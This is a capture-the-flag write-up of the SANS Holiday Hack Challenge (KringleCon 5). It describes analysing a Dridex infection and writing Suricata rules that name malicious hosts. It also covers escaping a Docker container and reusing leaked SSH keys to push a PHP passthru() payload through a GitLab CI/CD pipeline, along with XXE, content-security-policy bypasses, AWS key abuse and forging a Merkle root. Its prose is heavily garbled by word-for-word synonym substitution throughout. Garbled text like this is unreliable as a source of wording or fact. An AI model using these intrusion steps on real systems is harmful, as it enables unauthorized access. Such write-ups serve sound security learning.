Cracked it! Highlights from KringleCon 5: Golden Rings

That is my first yr taking part within the SANS Vacation Hack Problem and it was a blast. By way of a sequence of 16 challenges starting from simple to troublesome, I practiced analyzing suspicious community visitors and PowerShell logs, writing Suricata guidelines, breaking out of a Docker container, discovering leaked keys to take advantage of a GitLab CI/CD pipeline and an AWS person, conducting XML Exterior Entity assaults, and hacking a sensible contract to purchase a non-fungible token.

The most effective a part of this expertise was that it launched me to new instruments and applied sciences, thus stretching my cybersecurity data that a lot additional. Right here, I share a couple of highlights from fixing the challenges.

Orientation

Each participant receives an avatar to navigate an in-browser online game setting set on the North Pole:

Throughout orientation, you obtain a cryptocurrency pockets that the sport makes use of to award KringleCoins for finishing challenges and that you just use within the final problem to hack a sensible contract. Curiously, the sport retains observe of all KringleCoin transactions in an Ethereum blockchain, that means a whole report of your progress is saved on this blockchain too.

On to the primary ring of the sport.

1. Tolkien Ring

Discovering the Tolkien Ring required flexing my logs evaluation muscle mass.

Wireshark phishing

First, I used Wireshark to research the offered .pcap file that exposed a server at adv.epostoday[.]uk downloading the file Ref_Sept24-2020.zip to a pc:

Peeking contained in the ZIP file, I discovered an executable referred to as Ref_Sept24-2020.scr that triggered two detections in ESET Endpoint Safety: BAT/Runner.ES and Generik.TAGTBG. This malware ultimately result in a malicious executable operating in reminiscence referred to as config.dll and detected by ESET’s Superior Reminiscence Scanner as Win32/Dridex.DD.

Home windows occasion logs

Subsequent, I analyzed the offered .evtx file containing PowerShell logs with Occasion Viewer. Whereas there are different instruments to research PowerShell logs, if attackers know the right way to use living-off-the-land binaries to remain below the radar, defenders also needs to be well-versed within the native instruments an working system offers.

Because the logs contained 10,434 occasions, I grouped the occasions by date after which ran the Discover motion to search for any occasions containing the $ character. In PowerShell, $ is used to create and reference variables. I discovered an assault taking place on December 24, 2022, when the attacker ran the next script:

It seems just like the attacker discovered a secret recipe, switched out the key ingredient of honey for fish oil, after which created a brand new recipe file. This triggered an occasion with an ID of 4104, which stands for the execution of distant PowerShell instructions. So, I filtered the occasions by this ID, serving to me to search out further malicious occasions extra shortly.

Suricata Regatta

The final train for the Tolkien Ring was writing 4 Suricata guidelines to watch community visitors for a Dridex infestation:

alert dns $HOME_NET any -> any any (msg:”Identified dangerous DNS lookup, potential Dridex an infection”; dns.question; content material:”adv.epostoday.uk”; nocase; sid:1; rev:1;)

alert http 192.185.57.242 any <> any any (msg:”Examine suspicious connections, potential Dridex an infection”; sid:2; rev:1;)

alert tls any any -> any any (msg:”Examine dangerous certificates, potential Dridex an infection”; tls.cert_subject; content material:”CN=heardbellith.Icanwepeh.nagoya”; sid:3; rev:1;)

alert http any any -> any any (msg:”Suspicious JavaScript operate, potential Dridex an infection”; file_data; content material:”let byteCharacters = atob”; sid:4; rev:1;)

So as, these guidelines catch DNS lookups for adv.epostoday[.]uk, connections to the IP handle 192.185.57[.]242, the usage of the malicious server heardbellith.Icanwepeh[.]nagoya recognized through the frequent title (CN) in a TLS certificates, and the usage of the JavaScript atob() operate to decode a binary string containing base64-encoded information on the consumer.

Finishing these three challenges earned me the Tolkien Ring:

On to the second ring.

2. Elfen Ring

Essentially the most outstanding challenges for the Elfen Ring have been Jail Escape and Jolly CI/CD.

Jail Escape

Jail Escape was a stern reminder that granting root privileges to a person in a Docker container is simply pretty much as good as granting root privileges on the host system. The problem was to interrupt out of the container. Properly, simply completed if you find yourself root:

As the foundation person, I listed the partition tables for the machine after which mounted the host filesystem, granting me full entry to the host. Now I might seek for the important thing, which ought to be positioned within the residence listing as revealed by the in-game hints:

Jolly CI/CD

Whereas that was fast, Jolly CI/CD took me the longest of any problem to determine. First, we got a Git repository to clone over HTTP:

From the URL, I might see that the title of the repository was wordpress.flag.internet.inside, so I moved to the repository and located a WordPress web site. I checked if the web site was stay:

Yup, the web site was useful. I used to be curious if there have been any leaked keys within the supply code historical past. If sure, I ought to be capable to push edits to the supply code. So I ran git log:

From the commit messages, it seems like a commit was made after including belongings to repair a whoops. Time to take a look at the pre-whoops commit:

Glorious, I discovered a .ssh listing with keys. Let’s copy these keys over and configure an SSH agent and a Git person to see if I can impersonate the proprietor of these keys:

Now let’s return to the principle department and take a look at if we are able to push a trivial change to the supply code (utilizing nano, I merely added an area to one of many information):

So, I achieved the primary a part of the problem by impersonating one of many WordPress builders, however did the web site nonetheless work after my push?

My push modified one thing as a result of now the web site redirected to port 8080.

Till now, I had ignored the CI/CD portion of the problem, which ought to be the important thing to finishing it. The repository accommodates a .gitlab-ci.yml file, which offers the configuration for a GitLab CI/CD pipeline. Each time you push to the repository, the CI/CD system kicks in, and a GitLab Runner executes the scripts on this YML file. That’s pretty much as good as reaching distant code execution on the server the place GitLab Runner is put in, I assumed.

Trying nearer, I noticed an rsync script copying all of the information from the Git repository to the listing on the internet server from which the web site was being served. At first, I attempted to make use of rsync to reverse the info movement by copying all of the information from the online server to the Git repository, however with out success.

After lots of speculation testing, I finally had my breakthrough perception: As an alternative of making an attempt to “repair” the WordPress web site or run malicious scripts through the construct system, serve a web site that leaks data from the online server. Inside index.php (positioned on the prime stage of the repository), I can remark out the code that masses the WordPress web site and run PHP instructions that probe the online server.

Certainly, I may even run shell instructions with PHP. I discovered that passthru() labored simply.

In index.php, I used // to remark out two traces and I added passthru(‘ls -la /’); on the final line. This creates a web site that lists all of the information within the root listing of the online server:

Then I pushed this variation to the Git repository and the GitLab CI/CD system took care of updating the web site for me:

Ah, the Elfen Ring should be in flag.txt! I repeated the earlier steps, however this time utilizing passthru(‘cat /flag.txt’); revealing the Elfen Ring the following time I requested the web site:

On to the third ring.

3. Internet Ring

Essentially the most enjoyable problem for me was Open Boria Mine Door, though Glamtariel’s Fountain was fascinating whereas additionally presenting riddles.

Open Boria Mine Door

In Open Boria Mine Door, we have been offered with six pins or mini-challenges to bypass enter validation or a Content material Safety Coverage to attach the entry and exit pipes between the pins, together with matching the pipe colours. For many pins, I used HTML to jot down an inventory of connecting letter ‘o’s. Right here is my last resolution:

Pin 1

There was no validation for Pin 1, so it was a easy matter of HTML and inline CSS:

Pin 2

Pin 2 had a Content material Safety Coverage that disallowed JavaScript however allowed inline CSS, in order that was no drawback for my methodology:

Pin 3

Pin 3 had a Content material Safety Coverage that disallowed CSS however allowed inline JavaScript, so I used JavaScript to alter the types as a substitute:

Pin 4

Pin 4 had no Content material Safety Coverage, however it had a sanitizeInput operate on the consumer facet that might strip double quotes, single quotes, left angle brackets, and proper angle brackets. The trick right here was to comprehend that this operate wasn’t triggered by submitting the shape, however by the onblur occasion. In different phrases, shifting the mouse away from the enter area triggered the onblur occasion, sanitizing any enter. The answer was to submit the shape by urgent the Enter key, whereas taking care to not transfer the mouse cursor exterior the bounds of the enter area:

Pin 5

Pin 5 had the identical sanitizeInput operate and bypass together with a Content material Safety Coverage forbidding inline CSS, however permitting inline JavaScript:

Pin 6

Lastly, Pin 6 didn’t sanitize the enter, however it used a stricter Content material Safety Coverage forbidding each inline CSS and JavaScript. My resolution was to make use of deprecated HTML to get the types I wanted and use a desk as a substitute of an inventory:

Glamtariel’s Fountain

Glamtariel’s Fountain was a possibility to apply XML Exterior Entity (XXE) assaults. Determining the right way to outline a customized XML entity, defining an entity that requests a file from the server, and including that entity as a payload to an HTTP request was not onerous. The toughest half was determining the in-game riddles to divine the trail to the information that the server would leak. Right here is the breakthrough request revealing the situation of the gold ring:

I’d supply two classes discovered from this problem. First, use the Content material Sort Converter extension in Burp to transform JSON payloads to XML. Second, attempt inserting the XXE payload in several tags – it took me a very long time to determine that every one I needed to do was place the &xxe; payload within the reqType tag as a substitute of the imgDrop tag.

On to the fourth ring.

4. Cloud Ring

Enjoying for the Cloud Ring was a newbie’s foray into the Amazon Internet Companies (AWS) Command Line Interface (CLI).

The spotlight of this set of challenges was utilizing trufflehog to search out AWS credentials in a Git repository after which exploiting them to authenticate as an AWS person. An attacker that will get to this place can use aws iam instructions to question the insurance policies that apply to the person, and thus which cloud belongings could be accessed and abused.

On to the fifth ring.

5. Burning Ring of Fireplace

Essentially the most instructive a part of this set of challenges was studying about Merkle Bushes to take advantage of a sensible contract and get on the presale checklist for buying a non-fungible token (NFT). Right here the problem was to find the proof values that, together with my pockets handle and the foundation worth of a Merkle Tree, proved my inclusion on the presale checklist.

After a couple of unsuccessful makes an attempt to offer proof values, I spotted that I’d by no means be capable to work out the proof values for the offered root worth as a result of there was no method to know all of the leaf values used to calculate it. I wanted to alter the foundation worth in order that I might present a legitimate Merkle Tree.

Utilizing Professor QPetabyte’s device, I created a Merkle Tree from two leaves consisting of my pockets handle and the handle for the BSRS_nft good contract, which I discovered utilizing the in-game Blockchain Explorer in block two of the sport’s Ethereum blockchain. The device generated the foundation worth of this tree and the proof worth for my pockets handle. Then I used Burp to intercept the request to the server and adjusted the default root worth in order that I might submit a legitimate Merkle Tree. Right here is my NFT sporc purchased at a hard and fast worth of 100 KringleCoins:

An unpleasant specimen certainly.

Finale

An enormous thanks to the organizers of the SANS Vacation Hack Problem for stretching my thoughts in new methods and serving to to deepen my cybersecurity data. Not solely am I wanting ahead to subsequent yr’s problem, however I’ll even be making an attempt out the 2020 and 2021 editions of this problem. And in the event you haven’t participated on this problem earlier than, I hope these highlights have piqued your curiosity.